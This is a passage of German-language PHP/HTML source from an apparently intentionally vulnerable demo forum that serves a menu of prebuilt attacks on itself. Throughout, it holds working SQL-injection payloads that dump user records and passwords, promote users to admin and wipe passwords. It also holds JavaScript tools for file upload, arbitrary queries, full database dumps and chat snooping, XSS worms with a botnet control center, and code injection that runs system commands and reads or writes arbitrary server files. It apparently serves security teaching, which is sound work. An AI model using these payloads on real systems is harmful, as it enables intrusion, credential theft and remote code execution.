-1 union select $sij[1]ifnull(title,'Ohne Titel')||' ('||f.[create]||' - '||ifnull(u.username,'Unbekannt')||ifnull(' an: '||t.username,'')||')' as username,$sij[2]message as profil from forum as f left join user as u on u.id=f.userid left join user as t on t.id=f.mailid where f.id= 1
eof
)."' onClick='this.href=this.href.replace(/\+1/g,prompt(\"Geben Sie eine Beitrags-ID ein!\",1))'$atk>Jeden Forum/Mail-Eintrag anzeigen</a>
<li><a title='Durch Eingabe eines Benutzernamens oder Benutzer-ID können alle gespeicherten Daten vom entsprechenden Benutzer aus der Datenbank als Benutzerprofil angezeigt werden!' href='$self/Profil?id=".urlencode(strtr(<<<eof
-1 union select $sij[1]"Userdata" as username,$sij[2](select
"<code> ID: "||ifnull(id,"")||"\\\\
Erstellt:"||ifnull([create],"")||"\\\\
Geändert:"||ifnull(change,"")||" ("||ifnull(changes,"")||")\\\\
Logins: "||ifnull(logins,"")||"\\\\
Requests:"||ifnull(requests,"")||"\\\\
Status: "||ifnull(status,"")||"\\\\
IP: "||ifnull(ip,"")||"\\\\
Session: "||ifnull(session,"")||"\\\\
Browser: "||ifnull(useragent,"")||"\\\\
Benutzer:"||ifnull(username,"")||"\\\\
Kennwort:"||ifnull(password,"")||"\\\\
Antwort: "||ifnull(passhelp,"")||"\\\\
Vorname: "||ifnull(forename,"")||"\\\\
Nachname:"||ifnull(lastname,"")||"\\\\
eMail: "||ifnull(mail,"")||"\\\\
Homepage:"||ifnull(page,"")||"\\\\
Screen: "||ifnull(info,"")||"\\\\
Stadt: "||ifnull(town,"")||"\\\\
Geborn: "||ifnull(born,"")||"\\\\
Tagline: "||ifnull(tagline,"")||"\\\\
Profil:</code><br>"||ifnull(profil,"") from user where id= 1 or username like 1 ) as profil
eof
,"\t",""))."' onClick='this.href=this.href.replace(/\+1\+/g,String.fromCharCode(39)+prompt(\"Geben Sie eine User-ID oder einen Username ein!\",1)+String.fromCharCode(39))'$atk>Fremde Benutzerdaten anzeigen</a>
</li></ul><li><a class='wipe' href='$wiki/SQL-Injection#Blinde_SQL-Injection'$tgb>SQL-Injection</a> (Sicherheitslücke beim <a href='$self/Abmelden?id=-1'$sel>Abmelden</a> - für Daten Änderungen)<ul>
<li><a title='Für alle Benutzer wird das Status-Feld auf Abgemeldet gesetzt' href='$self/Abmelden?id=".urlencode(<<<eof
-1;update user set status=status&254
eof
)."'$atk>Alle Benutzer Abmelden</a>
<li><a title='Durch Eingabe eines Benutzernamens oder Benutzer-ID kann der entsprechende Benutzer als Administrator hochgestuft werden. Unabhängig davon, ob der Benutzer gesperrt war!' href='$self/Abmelden?id=".urlencode(<<<eof
-1;update user set status=ifnull(status,0)%2+2 where id= 1 or username like 1
eof
)."' onClick='this.href=this.href.replace(/(\+1)/g,String.fromCharCode(39)+prompt(\"Geben Sie eine User-ID oder einen Username ein!\",1)+String.fromCharCode(39))'$atk>Benutzerhochstufung zum Admin</a>
<li><a title='Durch Eingabe eines Benutzernamens oder Benutzer-ID kann das persöhnliche Kennwort des entsprechenden Benutzers gelöscht werden!' href='$self/Abmelden?id=".urlencode(<<<eof
-1;update user set password='' where id= 1 or username like 1
eof
)."' onClick='this.href=this.href.replace(/(\+1)/g,String.fromCharCode(39)+prompt(\"Geben Sie eine User-ID oder einen Username ein!\",1)+String.fromCharCode(39))'$atk>Benutzerkennwort entfernen</a>
</li></ul><li><a class='wipe' href='$wiki/SQL-Injection'$tgb>SQL-Injection</a> & <a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>Cross-Site-Scripting</a> (Sicherheitslücken Kombinieren)<ul>
<li><a title='Hier kann ein beliebiger Inhalt als Benutzerprofil ausgegeben werden! - (Ein Hack, der einen Benutzerdefinierten Hack Generiert!)' href='$self/Profil?id=".urlencode(preg_replace($js,'',<<<eof
-1 union select $sij[1]"SQL-Injection Construction Set" as username,$sij[2]"Enter what you want!<form name='hack' onsubmit='
location.href = location.href.replace(/SQL.*?Set/,encodeURIComponent(document.hack.user.value)).replace(/Enter.*(?=%22\+as\+profil)/,encodeURIComponent(document.hack.profil.value));
return false;
'>User:<br><input type='text' name='user' style='width:100%'><br>Profile:<br><textarea name='profil' style='width:100%'></textarea><br><input type='submit'></form>" as profil
eof
))."'$atk>Construction Set für das Profil</a> <small>(Nur Anzeige)</small>
<li><a title='".($k = 'Hier kann ein beliebiger Beitrag in das Forum geschrieben werden. Unabhängig davon, ob man Benutzer im Forum ist oder nicht!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".($a = "Forum/Mail Message")."\" as username,$sij[2]\"".($v = preg_replace($js,'',"Enter what you want!<form name='hack' onsubmit='location.href=echo();return false;'><table><tr><td width='99%'>Title:<br><input type='text' name='title' style='width:100%'></td><td>UserID:<br><input type='text' name='mail' size='1'></td></tr>
<tr><td colspan='2'>Message:<br><textarea name='message' style='width:100%'></textarea><br><input type='submit'></td></tr></table></form><script>
function echo() {
x = document.hack;
return location.pathname.replace('Profil','Abmelden') + ('?id="
.urlencode("-1;insert into forum([create],change,ip,mailid,title,message)values(datetime('now','localtime'),datetime('now','localtime'),0,nullif('_1_',''),nullif('_2_',''),'_3_')")
."') .replace(/_1_/,encodeURIComponent(x.mail.value))
.replace(/_2_/,encodeURIComponent(x.title.value))
.replace(/_3_/,encodeURIComponent(x.message.value));
}
</script>"))."\" as profil")."'$atk>Beliebige Einträge in das Forum</a> - <small><a title='$k' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"$a for Chrome\" as username,$sij[2]b64d(\"".base64_encode($v)."\") as profil")."'$atk><em>Chrome</em></a> (Dauerhaft)</small>
<li><a title='".($k = 'Hier kann eine neue Seite erstellt werden, die dauerhaft bestehen bleibt!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".($a = "SQL-Injection Construction Set (CMS)")."\" as username,$sij[2]\"".($v = "Enter what you want!<form name='c' onsubmit='location.href=echo();return false;'><table width='100%'><tr><td width='20%'>Name:<br><input type='text' name='n' style='width:100%'></td><td width='79%'>Info:<br><input type='text' name='i' style='width:100%'></td><td>Status:<br><input type='text' name='s' value='0' size='2'></td></tr></table>Content:<br><textarea name='c' style='width:100%'></textarea><br><input type='submit'></form><script>".preg_replace($js,'',"
function echo() {
c = document.c;
return location.pathname.replace('Profil','Abmelden') + ('?id="
.urlencode("-1;insert into cms([create],change,status,name,description,content)values(datetime('now','localtime'),datetime('now','localtime'),nullif('_1_',''),'_2_',nullif('_3_',''),nullif('_4_',''))")."')
.replace(/_1_/,c.s.value.replace(/\D+/g,''))
.replace(/_2_/,encodeURIComponent(c.n.value))
.replace(/_3_/,encodeURIComponent(c.i.value))
.replace(/_4_/,encodeURIComponent(c.c.value));
}
</script>"))."\" as profil")."'$atk>Beliebige Seiten im CMS anlegen</a> - <small><a title='$k' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"$a for Chrome\" as username,$sij[2]b64d(\"".base64_encode($v)."\") as profil")."'$atk><em>Chrome</em></a> (Dauerhaft)</small>
<li><a title='".($k = 'Hier können beliebige Dateien hochgeladen werden!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"".($a = "File-Upload over SQL-Injection".($b = preg_replace($js,'',"<script>
try { // Die Rückkanalmethode festlegen
var A = new XMLHttpRequest();
}
catch(e) {
jsdebug(e);
A = new ActiveXObject('Microsoft.XMLHTTP');
}
function query(q) { // SQL-Query durch die SQL-Injection-Lücke (Profil) schicken
if(A) {
A.open('GET',location.pathname.replace(/(\.php\d*)(\/\w+)?$/,'$1/'+((x = q.match(/^\s*select/i))
? 'Profil?id=-1+union+select+$sij[1](' + encodeURIComponent(q) + ')+as+username,$sij[2]0+as+profil'
: 'Abmelden?id=-1;' + encodeURIComponent(q)) + '&' + new Date().getTime()),false);
A.send(''); // Absenden
q = [q,((q = A.responseText.match(/<fieldset\sclass='cr'><legend>Profil\svon\s<b>([^\\0]*)<\/b><\/legend>(?:<div.*?<\/div)?<div\sid='profil'>0<\/div><\/fieldset>|(<b>Warning<\/b>[^\\0]*?)<!DOCTYPE/)))
? ((q[1] != '' && !q[2]) ? q[1] : ((q[2]) ? q[2].replace(/<[^>]*>/g,'') : '')) : ((x) ? false : '')]; // Ergebnis, Fehler oder nichts zurückgeben
if(typeof jsdebug == 'function') // Wurm-Requests Debuggen
jsdebug(q[0] + '\\x20->\\x20' + q[1]);
return q[1];
}
return false;
}</script>"))."<script>".preg_replace($js,'',"
function send(u) {
if((x = u.target.files[0])) {
y = new FileReader();
y.onload = function(v) {
for(a = b = c = 0, d = '', e = v.target.result, f = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'; a < e.length; )
for(c = (c << 8) + e.charCodeAt(a++), b += 8; b >= 6; )
d += f[c >> (b -= 6)],
c %= 1 << b;
if(b)
d += f[c << 6 - b];
query('insert into file([create],user,name,ip,info,size,type,data)values(datetime(\'now\',\'localtime\'),0,\'' + (c = (z.n.value) ? z.n.value : x.name) + '\',0,nullif(\'' + z.i.value + '\',\'\'),' + x.size + ',\'' + ((z.t.value) ? z.t.value : x.type) + '\',\'\')');
a = query('select max(id) from file');
b = 0;
while(b < d.length) {
query('update file set data = data||\'' + d.substr(b,parseInt(z.s.value)) + '\' where id = ' + a);
b += parseInt(z.s.value);
document.getElementById('fstat').innerHTML = Math.min(Math.round(b / d.length * 100),100) + '%';
}
alert('File Uploaded!\\n\\nLink:\\n' + document.getElementById('furl').firstChild.nodeValue + c)
};
y.readAsBinaryString(x);
}
}
</script>"))."\" as username,$sij[2]\"".($v = "Upload what you want! - **Download:** <span id='furl'>::f/0-</span>//filename// <span id='fstat'></span><form name='up'><table width='100%'><tr><td width='80%' colspan='2'>Filename: (Optional)<br><input type='text' name='n' style='width:100%'></td><td width='20%'>Content-Type: (Optional)<br><input type='text' name='t' style='width:100%'></td><tr><tr><td width='75%'>Description: (Optional)<br><input type='text' name='i' style='width:100%'></td><td width='5%'>Step:<br><input type='text' name='s' size='4' maxlength='4' value='4096'></td><td width='20%'>File Selection & Uploadstart:<br><input type='file' name='f' id='f'></td></tr></table></form><script>z=document.up;z.f.addEventListener('change',send,false);</script>")."\" as profil")."'$atk>Dateien in die Datenbank hochladen</a> <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]b64d('".base64_encode("$a for Chrome")."') as username,$sij[2]b64d('".base64_encode($v)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Dauerhaft)</small>
<li><a title='".($k = 'Hier können beliebige SQLite-Abfragen gemacht werden. (Es wird automatisch die entsprechende SQL-Lücke für den Befehl im Hintergrund ausgenutzt!)')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"SQLeak-Konsole$b\" as username,$sij[2]\"".($a = "<form name='leak'><textarea id='sqlquery' cols='80' rows='6' style='width:100%'></textarea><br><textarea id='result' cols='80' rows='6' style='width:100%' readonly></textarea><br><input type='button' value='Execute Query' onclick=y=document.leak;y.result.value='working...';y.result.value=query(y.sqlquery.value)> <input type='reset'></form><script>document.leak.sqlquery.focus()</script>")."\" as profil")."'$atk>SQLeak-Konsole</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"SQLeak-Console for Chrome\"||b64d('".base64_encode($b)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Einspaltige abfragen oder beliebige Änderungen)</small>
<li><a title='".($k = 'Hier können alle Chat-Mitteilungen in echtzeit mitgelesen werden')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Chat-Monitor".($v = preg_replace($js,'',preg_replace('|(?=</script>$)|',<<<eof
function cl() {
c = [document.getElementById('clout'),document.cc];
if((y = c[1].id.value) == 0)
c[0].innerHTML = '';
while((b = 0) || (a = query('select (select max(id) from chat)||\',\'||ifnull((
select c.id||\',\'||c.chat||\',\'||c.user||\',\'||u.username||\',\'||strftime(\'%s\',c.time)||\',\'||c.text
from chat as c
left join user as u on u.id = c.user
where c.id > ' + y + '\\x20
limit 1),0)')) && (b = a.match(/^(\d+),(?:\d|([\d-]+),([\d-]+),(\d+),([^,]+),(\d+),([^\\0]*))?$/)) && b[2]) {
c[2] = c[1].key.value;
while(d = c[2].match(/^(\w{32})(?=\W+|$)/)) {
c[2] = c[2].replace(/^\w+\W*/,''),
c[3] = d[1];
try {
if(CryptoJS && (d = b[7].match(/^(\w+)\/([\w\/+]+=*)$/)) && (c[4] = CryptoJS.AES.decrypt(d[2],c[3])) && (c[4] = c[4].toString(CryptoJS.enc.Utf8)) && CryptoJS.MD5(c[3] + ',' + c[4]) == d[1])
b[7] = c[4],
c[2] = '';
}
catch(e) {
jsdebug(e);
}
}
(a = document.createElement('p')).innerHTML = '<fieldset style=\'word-break:break-all\'><legend title=\'' + b[2] + '\'><b>' + b[5] + '</b> <small>{' + b[4] + '} (' + (new Date(b[6]*1000).toLocaleString()) + ')</small>' + ' [' + b[3] + ']<\/legend>' + b[7].replace(/</g,'<').replace(/>/g,'>') + '<\/fieldset>';
c[0].appendChild(a);
c[0].scrollTop = c[0].scrollHeight;
y = b[2];
}
c[1].id.value = (b && b[1]) ? b[1] : y;
setTimeout('cl()',10 * 1000);
};
function sm(y) {
b = y.send.value;
if(CryptoJS && (c = y.key.value.match(/\W*(\w{32})(?=\W+|$)/)))
b = (CryptoJS.MD5(c[1] + ',' + b) + '/' + CryptoJS.AES.encrypt(b,c[1]).toString() + '=').replace(/=(?==$)/,'');
query('insert into chat (time,chat,user,text) values (datetime(\'now\',\'localtime\'),' + y.chat.value + ',' + y.user.value + ',\'' + b + '\')');
y.send.value = '';
return false;
};
setTimeout('cl()',500);
eof
,$b))."<script src='{$jschat['crypt']['aes']}'></script>")."\" as username,$sij[2]\"".($a = "<form action='#' name='cc' onsubmit='return sm(this)'><div id='clout' style='width:100%;height:400;overflow-x:auto;overflow-y:auto'></div><table width='100%'><tr><td width='99%'>Send Message:<br><input type='text' name='send' style='width:100%'></td><td>Key:<br><input type='text' name='key' size='32' onchange='document.cc.id.value=0'></td><td>Chat:<br><input type='text' name='chat' size='3' value='0'></td><td>User:<br><input type='text' name='user' size='3' value='0'></td><td nowrap>Control:<br><input type='text' name='id' size='3' value='0'><input type='submit'></td></tr></table></form>")."\" as profil")."'$atk>Chat-Monitor</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Chat-Monitor for Chrome\"||b64d('".base64_encode($v)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Zeigt den aktuellen Chatverlauf aller Benutzer an)</small>
<li><a title='".($k = 'Hier kann die komplette Datenbank als SQL-Dump ausgelesen werden!')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"DB-Leak".($v = preg_replace(array('!(?=</)!',$js),array("function leakdatabase() {
e = document.leak;
f = e.sqldump;
f.value = '',
t = query('select count(*) from $sql[m] where type=\'table\''); // Anzahl der Tabellen in der Datenbank
if(t.match(/^\d+$/)) {
for(a=0;a < t;a++) {
c = query('select sql from $sql[m] where type=\'table\' limit ' + a + ',1'); // Tabellen Struktur auslesen
f.value += (e.create.checked) ? c.replace(/^([^\\0]*)$/,'/* \\$1; */\\n') : c + ';\\n';
if((m = c.match(/create table\s*(\[?.*?\]?)\s*\(\s*([^\\0]*)\s*\)\s*;?\s*$/i))) { // Tabellennamen erkennen
n = m[1],
c = m[2].replace(/\s*,\s*/g,'\\n').match(/^\s*\[?[^\]\s]+\]?/gm); // Tabellenspalten erkennen
for(b=0;b < c.length;b++)
c[b] = c[b].replace(/[\\x00-\\x20]/g,''); // Spaltennamen säubern
l = query('select count(*) from ' + n); // Größe der Tabellen ermitteln
if(l.match(/^\d+$/)) {
for(b=0;b < l;b++) { // Daten aus den Tabellen holen
f.value += 'insert into ' + n + ' (' + c.join(',') + ') values (' + query('select quote(' + c.join(')||\',\'||quote(') + ') from ' + n + ' limit ' + b + ',1') + ');\\n';
f.scrollTop = f.scrollHeight;
}
}
}
}
}
}",''),$b))."\" as username,$sij[2]\"".($a = "<form name='leak'><textarea id='sqldump' cols='80' rows='25' style='width:100%' readonly></textarea><br><input type='button' value='Reading Database' onclick='leakdatabase()'> <input type='checkbox' name='create'>'Create Table' impersonate Comment</form>")."\" as profil")."'$atk>DB-Leak</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"DB-Leak for Chrome\"||b64d('".base64_encode($v)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Komplette Datenbank als SQL-Dump auslesen)</small>
</li></ul><li><a class='wipe' href='$wiki/Computerwurm'$tgb>XSS-Wurm</a> mit <a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>Cross-Site-Scripting</a> in der <a href='$self/Profil?id=-1'$sel>Profilanzeige</a> <small>(<a href='$self/SQL?worm'$rel$sel>Daten vom Wurm</a>)</small><ul>
<li><a title='Quelltext des Wurms!' href='$self/Worm.txt'$sel>XSS-BotWurm</a> in der <a title='$var[0] Den Wurm ausführen!' href='$self/Suche?q=%3cscript+src=\"$self/worm.js\"%3e%3c/script%3e'$atk>Suche</a> /
<a title='Den Wurm als Benutzerprofil ausgeben!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]'Wurm' as username,$sij[2]'//Ich glaube - hier ist der [[^Worm.txt|Wurm]] drin...// 8O ~~ <script src=\"$self/worm.js\"></script>' as profil")."'$atk>Profil</a> <small>(Anzeige)</small> /
<a title='Den Wurm als Beitrag in das Forum setzen!' href='$self/Abmelden?id=".urlencode("-1;insert into forum ([create],change,ip,message) values (datetime('now','localtime'),datetime('now','localtime'),0,'//Ich glaube - hier ist der [[^Worm.txt|Wurm]] drin...// 8O ~~ <script src=\"$self/worm.js\"></script>')")."'$atk>Forum</a> /
<a title='Einen Wurm-Loader in einen Login-Cookie verstecken!' href='$self/Suche?q=".urlencode("<script>document.cookie='username=".urlencode("\"><script type=\"text/javascript\" src=\"$self/worm.js\"></script><input type=\"hidden")."'</script>")."'$atk>Cookie</a> <small>(Dauerhaft)</small>
<li><a title='Quelltext des einfachen Wurms!' href='$self/Wormy.txt'$sel>XSS-Mini-Wurm</a> im <a title='Den einfachen Wurm in das Benutzerprofil ausgeben!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]'Wurmy' as username,$sij[2]'<script src=\"$self/wormy.js\"></script>' as profil")."' onClick='this.href=this.href.replace(/(wormy)/,\"\$1?~\"+prompt(\"Bitte die Url für eine Blinde-Webseite eingeben!\",\"$attack[_elink_]\"))'$atk>Benutzerprofil</a> <small>(Verbreitet sich mit blinder Webseite)</small>
<li><a title='Quelltext des Tagline-Wurms!' href='$self/Wormline.txt'$sel>XSS-Tagline-Wurm</a> im <a title='Mini-Wurm das Tagline des aktuellen Benutzers installieren!' href='$self/Profil?tl=".urlencode("Worminside!".str_pad("",80,"\t").preg_replace($js,'',$attack['_worm_']))."' onClick='this.href=this.href.replace(/=.*?(?=%09)/,\"=\"+prompt(\"Bitte geben Sie einen Text ein!\",\"Big trouble by a tiny Worm!\"))'$atk>Benutzerprofil</a> <small>(Kann sich nur mit Text Verbreiten)</small>
<li><a title='".($k = 'Befehle an Bot(s) schicken')."' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Botnet".($v = preg_replace($js,'',preg_replace('|(?=</script>$)|',<<<eof
function cc(y) {
z = document.bn; // Kürzel für das CC-Formular
if(y > 0) {
z.op.value += new Date().toLocaleString() + ' [' + z.cid.value + '] @' + z.bid.value + ' ' + z.bo[z.bo.selectedIndex].label + '\\n';
query('replace into chat (id,chat,user,time,text) values (0,0,0,datetime(\'now\'),\'<!--807:' + ((y == 2) ? 9999 + (z.cid.value = 1) : z.cid.value++)
+ ',' + z.bid.value + ',' + z.ip.value.replace(/##var##/g,z.rpv.value).replace(/'/g,'\'\'') + '//-->\')');
z.op.scrollTop = z.op.scrollHeight; // Console runterscrollen
}
else if(z && !y) { // Status abfragen
do {
if((a = query('select (select count(*) from user where chat =\\t\'-0\')||\',\'||
(select count(*) from chat where chat =\\t\'-0\')||ifnull((
select \',\'||c.id||\',\'||user||\',\'||u.username||\',\'||datetime(time)||\',\'||text
from chat as c left join user as u on u.id = c.user where c.chat =\\t\'-0\'
order by c.id limit 1),\'\')')) && (b = a.match(/^(\d+),(\d+)(?:,(\d+),(\d+),([^,]+),([^,]+),([^\\0]*))$/))) {
query(((b[1]) ? 'update user set chat = null where chat =\\t\'-0\';' : '') // ChatCalls zurücksetzen
+ ((b[2]) ? 'delete from chat where id=' + b[3] : '')); // BotRückmeldungen löschen
if(b[2])
z.op.value += b[6] + ' ' + b[5] + '(' + b[4] + ')\\n' + b[7] + '\\n'; // Rückmeldungen ausgeben
z.op.scrollTop = z.op.scrollHeight; // Console runterscrollen
}
}
while(a && b && b[2] > 1);
}
if(!y)
setTimeout('cc(0)',((z && (a = parseInt(z.rf.value,10))) ? a : 10) * 1000); // Ein paar Sekunden warten
else if(y == -1) { // Eine Nachricht im Chat absetzen
if(z.cm.value.match(/^^\W*$/))
z.cm.value = '1,Welcome!' + unescape('%09%09%09<iframe style=%27display:none%27 src=%27$self?q=%252bw0rm%253cscript src=%2527$self/worm.js%2527><%2fscript>%27></iframe>');
if((a = prompt('Chat Message to all',z.cm.value))) {
z.cm.value = a;
if((a = a.match(/^(?:(\d+),)?(.*)$/)))
query('insert into chat (chat,user,time,text) values (0,' + ((a[1]) ? a[1] : 0) + ',datetime(\'now\'),\'' + a[2].replace(/'/g,'\'\'') + '\')');
}
}
else if(y == -2) // Alle Chat-Memos löschen
query('delete from chat where chat = 0');
else if(y == -3) {
query('delete from user where id = 0'); // Alle Spuren löschen
location.href = location.pathname;
}
};
function mh() { // Botnet-Angriffe einbetten
b = [],c=unescape('%22');
for(d=0;d<a.length;d+=2)
b.push('<option' + (a[d+1] ? ' value=' + c + a[d+1] + c : '') + (((e = a[d].split(',')) && e[1]) ?' title=\'' + e[1] + '\'' : '') + '>' + e[0] + '</option>');
return '<select name=\'bo\' onchange=\'
z = document.bn;
if(this.selectedIndex > 1) {
z.ip.value = this.value;
z.rpv.value = this[selectedIndex].title;
}\'>' + b.join('') + '</select>';
};
setTimeout('cc(0)',500);
query('replace into user (id,[create],change,status,chat,username,password,forename,lastname,mail) values (0,0,0,null,0,807,1337,808,57341,600613)');
a = 'Refresh,,Command [Custom],,Reset,W=0;R'.split(',');
eof
,$b)))."\" as username,$sij[2]\"".($a = "<script src='".((isset($attack['_bnlink_']) and $attack['_bnlink_']) ? $attack['_bnlink_'] : "$self/bnps")."'></script>".<<<eof
<form name='bn' onsubmit='cc(document.bn.bo.selectedIndex);return false'><input type='hidden' name='cm'><table border='1' width='100%'><tr><td>ID<br><input type='text' name='cid' size='3' value='1'></td><td>Bot_ID<br><input type='text' name='bid' size='3' value='0'></td><td>Refresh<br><input type='text' name='rf' size='3' value='10'></td><td width='99%'>Variable<br><input type='text' name='rpv' style='width:100%'></td><td nowrap>Command<br><script>document.write(mh())</script></td><td nowrap>Control<br><input type='submit'> <input type='button' value='Chat Memo' onclick='cc(-1)'></td><td nowrap>Reset<br><input type='reset'> <input type='button' value='Clear' onclick='(z=document.bn).op.value=z.ip.value=z.rpv.value=document.body.title'> <input type='button' value='CleanUp' onclick='cc(-2)'> <input type='button' value='Exit' onclick='cc(-3)'></td></tr><tr><td colspan='7'><textarea name='ip' rows='4' style='width:100%' onchange='document.bn.bo.selectedIndex=1'></textarea><br><textarea name='op' rows='16' style='width:100%' readonly></textarea></td></tr></table></form>
eof
)."\" as profil")."'$atk>Botnet Control-Center</a> - <small><a href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Botnet for Chrome\"||b64d('".base64_encode($v)."') as username,$sij[2]b64d('".base64_encode($a)."') as profil")."' title='$k'$atk><em>Chrome</em></a> (Setzt Infizierte User mit XSS-Wurm voraus!)</small>
</li></ul><li><a class='wipe' href='http://en.wikipedia.org/wiki/Code_injection'$tgb>Code-Injection</a> (<a class='wipe' href='$wiki/SQL-Injection'$tgb>SQL-Injection</a> & <a class='wipe' href='$wiki/Cross-Site-Scripting'$tgb>XSS</a>) über die <a href='Creole'$sel>Creole-Formatierung</a>:<ul>
<li><a title='Die PHP-Variabeln im Benutzerprofil anzeigen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"PHP-Variabeln\" as username,$sij[2]\"@@?~?a:$~{base}??@@\n??a:\${base}??\n\n@@?~?a:$~_SERVER[SERVER_SOFTWARE]??@@\n??x:\$_SERVER[SERVER_SOFTWARE]??\n\n@@<<~echo $~_SERVER[PATH]>>@@\n<<echo \$_SERVER[PATH]>>\n\n\n@@~<<~<echo $~_SERVER[SERVER_PORT]>>>@@\n<<<echo \$_SERVER[SERVER_PORT]>>>\n\n@@~|$~_SERVER[SERVER_NAME]|$~_SERVER[SERVER_ADDR]|@@\n|\$_SERVER[SERVER_NAME]|\$_SERVER[SERVER_ADDR]|\n\n@@~* $~_SERVER[DOCUMENT_ROOT]@@\n* \$_SERVER[DOCUMENT_ROOT]\n\n@@~; $~_SERVER[SCRIPT_FILENAME] ~: $~_SERVER[SCRIPT_NAME]@@\n; \$_SERVER[SCRIPT_FILENAME] : \$_SERVER[SCRIPT_NAME]\n\n@@[~b]$~_SERVER[HTTP_USER_AGENT][~/b]@@\n[b]\$_SERVER[HTTP_USER_AGENT][/b]\n\n$info[1]\" as profil")."'$atk>PHP-Variablen</a> ausgeben
<li><a title='Die PHP-Funktion phpinfo() im Benutzerprofil ausführen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"PHP-Info\" as username,$sij[2]\"??x:$\"||\"{@die(phpinfo())}??\n\n$info[1]\" as profil")."'$atk>PHP-Informationen</a> ausgeben
<li><a title='Beliebigen Programmbefehl auf dem Server ausführen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Code-Injection\" as username,$sij[2]\"??x:$\"||\"{@die(system(preg_replace('/^(?=.)/e','header(\'content-type: text/plain\')','echo')))}??\n\n$info[1]\" as profil")."' onClick='this.href=this.href.replace(/(echo)/g,prompt(\"Bitte geben Sie einen Befehl ein!\",\"ping localhost".((stristr($_SERVER['HTTP_USER_AGENT'],'linux')) ? " -c4" : '')."\"))'$atk>Beliebigen Programm-Befehl</a> ausführen
<li><a title='Beliebige Dateien auf dem Server herunterladen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"File-Download\" as username,$sij[2]\"??x:$\"||\"{@die(readfile(preg_replace(array('/^/e','/$/e'),array('header(\'content-type: application/octet-stream\')','header(\'Content-Disposition: filename=\'.chr(34).basename(\'down\').chr(34))'),'down')))}??\n\n$info[1]\" as profil")."' onClick='this.href=this.href.replace(/(down)/g,prompt(\"Bitte Download-Datei angeben!\",\"$base\"))'$atk>Datei-Download</a> vom Server für beliebige Dateien
<li><a title='Beliegige Dateien auf den Server hochladen!' href='$self/Profil?id=".urlencode("-1 union select $sij[1]\"File Upload\" as username,$sij[2]\"<form enctype='multipart/form-data' action='$self/Profil?id=".urlencode("-1 union select $sij[1]\"Upload\" as username,$sij[2]\"??x:\${@die((move_uploaded_file(\$_FILES['file']['tmp_name'],getcwd().'/'.\$_FILES['file']['name']))?'<a href=\''.preg_replace('/\/.*$/','','$self').'/'.urlencode(\$_FILES['file']['name']).'\'>'.\$_FILES['file']['name'].'</a>':'Upload Fehlgeschlagen')}??\" as profil")."' method='post'><input type='file' name='file'><input type='submit'></form>\n\n$info[1]\" as profil")."'$atk>Datei-Upload</a> zum Server <small>(Dauerhaft)</small>
</li></ul></ol><ul><li><a class='wipe' href='$wiki/Administrator_(Rolle)'$tgb>Administrator Funktionen</a>: <small><a href='$self/Backup' title='Datenbank sichern und wiederherstellen'$rel$sel>Backup</a> / <a href='$self/CMS' title='Content-Management-System'$rel$sel>CMS</a> / <a href='$self/SQL' title='Vollständige und uneingeschränkte SQLite-Konsole'$rel$sel>SQL-Konsole</a> (Nur mit Admin-Rechten!)</small>
<li><a class='wipe' href='$wiki/Easter_Egg'$tgb>Versteckte Funktionen</a>: <small >
<a title='Creole-Schreibweise testen!' href='$self/Creole'$sel>Creole</a> /
<a title='Den vollständigen Quelltext des Forums anzeigen!' href='$self/source.txt'$sel>Quelltext</a> - <a title='Quelltext des Forums herunterladen!' href='$self/source.php.gz'$rel$sel>Download</a> /
<a title='Debugausgaben bei jeden Request mit ausgeben!' href='$self/Debug'$rel$sel>Debuginfos</a> /
<a title='Per Cookie die Ziel-Url für die Leak-Angriffe ändern!' href='#' onclick='".preg_replace($js,'',<<<eof
if(a = prompt("Bitte geben Sie ein ZielURL für die Angriffe ein!",((b = document.cookie.match(/(?:^|\s*;)to=(http:[^\s;#?]+)/)) ? b[1] : "$Self")))
if(b = a.match(/http:[^\s;#?]+/))
document.cookie = "to=" + b[0] + "; path=$self";
return false;
eof
)."'$rel$sel>LeakUrl ändern</a> /<br />
<a title='Persönline Benutzerfrage ausgeben' href='$self?ask=' onclick='return(a=prompt(\"Bitte geben Sie ein Benutzernamen".(($leak) ? "" : ":eMail")." ein!\",\"\"))?this.href+=a:false;'$rel$sel>Benutzerfrage</a> /
<a title='Password-Salt vom Benutzer ausgeben' href='$self?salt='$rel$sel onclick='return(a=prompt(\"Bitte geben Sie ein Benutzernamen ein!\",\"\"))?this.href+=a:false'>Pass-Salt</a> /
<a title='Ajax-Chat Funktion' href='$self/Chat?chat=html:0'$rel$sel>Chat-API</a> /
<a title='Alle Cookies dauerhaft Speichern (für 365 Tage)' href='$self/Cookie'$rel$sel>Cookie</a> /
<a title='Sicherheitslücken mit Cookies an/abschalten!' href='$self/Leak'$rel$sel>Sicherheits-Modus</a> /
